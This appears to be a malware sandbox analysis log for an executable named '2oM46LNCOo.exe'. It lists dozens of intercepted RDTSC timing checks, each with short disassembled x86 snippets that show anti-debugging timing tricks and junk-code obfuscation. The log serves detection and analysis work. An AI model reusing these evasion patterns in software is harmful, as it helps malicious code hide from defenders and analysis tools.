Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F0EC2 second address: 9F0F39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6E9D0B3536h 0x00000009 jns 00007F6E9D0B3536h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F6E9D0B3538h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D2C19h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F6E9D0B3538h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 push 00000000h 0x00000053 mov bx, 316Ah 0x00000057 mov dword ptr [ebp+12459552h], edx 0x0000005d xchg eax, esi 0x0000005e jl 00007F6E9D0B3542h 0x00000064 jng 00007F6E9D0B353Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F1EDB second address: 9F1EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F1EE0 second address: 9F1F32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, 2231C4BFh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F6E9D0B3538h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov bh, 98h 0x0000002f push 00000000h 0x00000031 movsx edi, ax 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 jo 00007F6E9D0B353Ch 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F1F32 second address: 9F1F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F1F36 second address: 9F1F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F2DF2 second address: 9F2DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F2DF9 second address: 9F2E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub bh, FFFFFFA6h 0x0000000c sbb edi, 51AB444Eh 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F6E9D0B3538h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e add dword ptr [ebp+122D252Fh], ebx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F6E9D0B3538h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 jnc 00007F6E9D0B3548h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F2E6D second address: 9F2E72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F4AED second address: 9F4B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E9D0B3540h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F4B08 second address: 9F4B5B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007F6E9CE04426h 0x0000000d pop esi 0x0000000e popad 0x0000000f nop 0x00000010 sub dword ptr [ebp+122D1CE4h], esi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F6E9CE04428h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 jnl 00007F6E9CE0442Bh 0x0000003a mov bx, dx 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push ecx 0x00000043 pop ecx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F4B5B second address: 9F4B61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F4B61 second address: 9F4B6B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6E9CE0442Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E8F97 second address: 9E8FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F6E9D0B3544h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E8FB7 second address: 9E8FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6E9CE04426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9EADE2 second address: 9EADE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9EADE7 second address: 9EADF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6E9CE04426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9EADF1 second address: 9EADFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9ECF6D second address: 9ECF73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9FCD16 second address: 9FCD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9FCD1A second address: 9FCD46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04438h 0x00000007 jng 00007F6E9CE04426h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F6E9CE04426h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9FCD46 second address: 9FCD96 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E9D0B3536h 0x00000008 jg 00007F6E9D0B3536h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F6E9D0B3548h 0x00000015 jmp 00007F6E9D0B3542h 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007F6E9D0B3536h 0x00000022 jmp 00007F6E9D0B353Eh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9FECCA second address: 9FECCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9FECCE second address: 9FED04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3548h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F6E9D0B3545h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9EDF74 second address: 9EDF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E9CE04439h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9EEFFB second address: 9EF009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A01245 second address: A0124F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E9CE04426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A0124F second address: A0125A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F30AE second address: 9F30CB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6E9CE0442Ch 0x00000008 jnl 00007F6E9CE04426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E9CE0442Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F30CB second address: 9F30D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F30D0 second address: 9F30D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A054A2 second address: A054A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A054A8 second address: A054AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A05770 second address: A05774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A05774 second address: A0577A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A090B1 second address: A090D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E9D0B353Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E9D0B3543h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A090D5 second address: A090DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A090DB second address: A090E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A090E1 second address: A090EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A090EA second address: A09129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E9D0B3543h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F6E9D0B3546h 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F6E9D0B3536h 0x0000001a jnp 00007F6E9D0B3536h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A09790 second address: A09796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A09909 second address: A09922 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E9D0B3542h 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A09922 second address: A09928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A09BFA second address: A09BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A09BFF second address: A09C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A0A155 second address: A0A15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A0A15B second address: A0A181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6E9CE04431h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F6E9CE0442Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A0A181 second address: A0A196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E9D0B3541h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A0A196 second address: A0A19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A0A19C second address: A0A1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A0F323 second address: A0F32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6E9CE04426h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A0F7BA second address: A0F7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A102C2 second address: A102C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A102C6 second address: A102D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F6E9D0B3536h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A102D8 second address: A102DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A102DC second address: A102FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3548h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A102FA second address: A1030E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jp 00007F6E9CE04426h 0x0000000b pop esi 0x0000000c jng 00007F6E9CE0442Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A0F058 second address: A0F05E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A1A310 second address: A1A314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A1A314 second address: A1A337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E9D0B3549h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A1939D second address: A193A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6E9CE04426h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A193A8 second address: A193AD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A193AD second address: A193D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 jnc 00007F6E9CE0442Ah 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F6E9CE0442Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A197EC second address: A197F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A19BE7 second address: A19BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6E9CE04426h 0x0000000a pop edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A213D0 second address: A213D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DC025 second address: 9DC096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04432h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F6E9CE0442Bh 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F6E9CE04428h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 sub dword ptr [ebp+122D3034h], esi 0x00000036 lea eax, dword ptr [ebp+12486D82h] 0x0000003c mov cx, E79Ah 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F6E9CE04435h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DC096 second address: 9DC09C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DC09C second address: 9C48C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F6E9CE0442Fh 0x00000010 jmp 00007F6E9CE0442Fh 0x00000015 popad 0x00000016 pop edx 0x00000017 nop 0x00000018 mov edi, 501BED17h 0x0000001d mov ecx, esi 0x0000001f call dword ptr [ebp+122D2FCFh] 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DC18F second address: 9DC1AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6E9D0B3538h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F6E9D0B353Ch 0x00000018 jnp 00007F6E9D0B3536h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DC840 second address: 9DC844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD036 second address: 9DD03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD03A second address: 9DD05F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dx, 5CDCh 0x00000011 push 0000001Eh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD1B1 second address: 9DD1D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6E9D0B3548h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD47B second address: 9DD499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F6E9CE0442Dh 0x0000000f jc 00007F6E9CE04426h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD499 second address: 9DD502 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E9D0B3546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cx, 3D0Dh 0x0000000f lea eax, dword ptr [ebp+12486DC6h] 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F6E9D0B3538h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D303Ah], esi 0x00000035 push eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F6E9D0B3545h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD502 second address: 9DD506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD506 second address: 9C53E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push ebx 0x0000000f mov dx, bx 0x00000012 pop edx 0x00000013 lea eax, dword ptr [ebp+12486D82h] 0x00000019 adc cx, 3FA6h 0x0000001e nop 0x0000001f jmp 00007F6E9D0B353Eh 0x00000024 push eax 0x00000025 jmp 00007F6E9D0B3549h 0x0000002a nop 0x0000002b xor di, BDD5h 0x00000030 call dword ptr [ebp+12464179h] 0x00000036 push ecx 0x00000037 jmp 00007F6E9D0B3548h 0x0000003c pop ecx 0x0000003d pushad 0x0000003e pushad 0x0000003f jno 00007F6E9D0B3536h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A20679 second address: A2067E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
